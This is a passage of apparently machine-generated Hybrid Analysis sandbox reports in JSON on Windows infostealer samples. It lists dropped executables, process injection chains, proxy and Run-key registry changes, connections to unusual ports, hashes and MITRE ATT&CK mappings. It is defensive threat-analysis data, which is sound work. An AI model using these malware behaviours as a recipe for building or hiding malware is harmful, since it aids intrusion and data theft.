\"RT_BITMAP:7.50143540923\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.47418377893\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.57809605676\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.5470070623\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.48221195117\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.47686624885\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.52824265469\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.51159283061\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.52395347176\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.54683261403\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.4033585794\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.25620023645\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.27220574434\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.3180086099\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.27901887581\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.42690017545\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.26429954363\"\n \"ywrej.exe\" has resource with unusual entropy \"RT_BITMAP:7.34396971718\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an entrypoint in section \".Jk)\"\n \"ywrej.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ywrej.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\ywrej.exe]- [targetUID: 00000000-00003636]\n \"DISMHOST.EXE.67A48065.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" wrote 24576 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"lojebo.exe\" wrote 11928 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ywrej.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ff10000e1fff09ff21ff014cff21ffff546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a24370000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has section name .Jk) with entropy \"7.96981994995\"\n \"ywrej.exe\" has section name UPX1 with entropy \"7.99923984807\"\n \"DISMHOST.EXE.67A48065.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A48065.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"lojebo.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000005e5b8a17437900000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f16ea467cd74a4670000000000000000\" - (UID: 00000000-00003636)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004296)\n Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00001552)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"ywrej.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%TEMP%\\meorm.exe\" spawned likely due to injection\n Process \"%TEMP%\\ywrej.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"%TEMP%\\lojebo.exe\" connects to <IPv4> on port 11110 (TCP)\n Process \"%TEMP%\\lojebo.exe\" connects to <IPv4> on port 11170 (TCP)\n Process \"%TEMP%\\lojebo.exe\" connects to <IPv4> on port 11110 (TCP)\n Process \"%TEMP%\\lojebo.exe\" connects to <IPv4> on port 11110 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\ywrej.exe\" has high entropy 7.987279306229216", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"meorm.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"meorm.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"lojebo.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"lojebo.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\meorm.exe (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\_vslite.bat (UID: 00000000-00005832)\n \"meorm.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\lojebo.exe (UID: 00000000-00006120)\n \"lojebo.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\ywrej.exe (UID: 00000000-00003636)\n \"lojebo.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\_vslite.bat (UID: 00000000-00003636)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (UID: 00000000-00005832)\n Spawned process \"meorm.exe\" (UID: 00000000-00006120)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004296)\n Spawned process \"lojebo.exe\" with commandline \"OK\" (UID: 00000000-00003636)\n Spawned process \"ywrej.exe\" (UID: 00000000-00001924)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00001552)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe\" (Handle: 652)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe\" (Handle: 652)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe\" (Handle: 652)\n \"meorm.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe\" (Handle: 684)\n \"meorm.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe\" (Handle: 684)\n \"meorm.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe\" (Handle: 684)\n \"lojebo.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ywrej.exe\" (Handle: 856)\n \"lojebo.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ywrej.exe\" (Handle: 856)\n \"lojebo.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ywrej.exe\" (Handle: 856)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 11110\n TCP traffic to <IPv4> on port 11170\n TCP traffic to <IPv4> on port 11110\n TCP traffic to <IPv4> on port 11110", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0
https://hybrid-analysis.com/sample/75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0
Hybrid Analysis - Infostealers
{"size": 47842, "type": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "submit_name": "75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0", "sha256": "75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0", "av_detect": 89, "vx_family": "GenPack:Generic.Malware.SF", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "total_processes": 3, "total_signatures": 98, "extracted_files": [{"name": "microsofthelp.exe", "file_path": "%WINDIR%\\microsofthelp.exe", "file_size": 48102, "sha256": "e466c18697ebd2e7137a1dfbf13bc585caece9cd766911eb9dada62d3041aa5c", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "runtime_process": "75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe (PID: 5864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "microsofthelp.exe.bin", "file_size": 48102, "sha256": "e466c18697ebd2e7137a1dfbf13bc585caece9cd766911eb9dada62d3041aa5c", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MICROSOFTHELP.EXE.67A47CC6.bin", "file_size": 48102, "sha256": "e466c18697ebd2e7137a1dfbf13bc585caece9cd766911eb9dada62d3041aa5c", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005864", "name": "75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe", "normalized_path": "C:\\75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe", "sha256": "75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0", "av_label": "GenPack:Generic.Malware.SF", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00005876", "parentuid": "00000000-00005864", "name": "microsofthelp.exe", "normalized_path": "%WINDIR%\\microsofthelp.exe", "sha256": "e466c18697ebd2e7137a1dfbf13bc585caece9cd766911eb9dada62d3041aa5c"}, {"uid": "00000000-00001224", "name": "microsofthelp.exe", "normalized_path": "%WINDIR%\\microsofthelp.exe", "sha256": "e466c18697ebd2e7137a1dfbf13bc585caece9cd766911eb9dada62d3041aa5c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\motherFucker\" in Source: 31702-8-00401DC0\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 31702-20-00401A70\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00001224.00000000.76170.00401000.00000040.mdmp\n 00000000-00001224.00000001.77777.00401000.00000040.mdmp\n \"Software\\motherFucker\" in Source: 00000000-00001224.00000000.76170.00401000.00000040.mdmp\n 00000000-00001224.00000001.77777.00401000.00000040.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00001224.00000001.77777.00260000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005864.00000000.66397.00401000.00000040.mdmp\n \"Software\\motherFucker\" in Source: 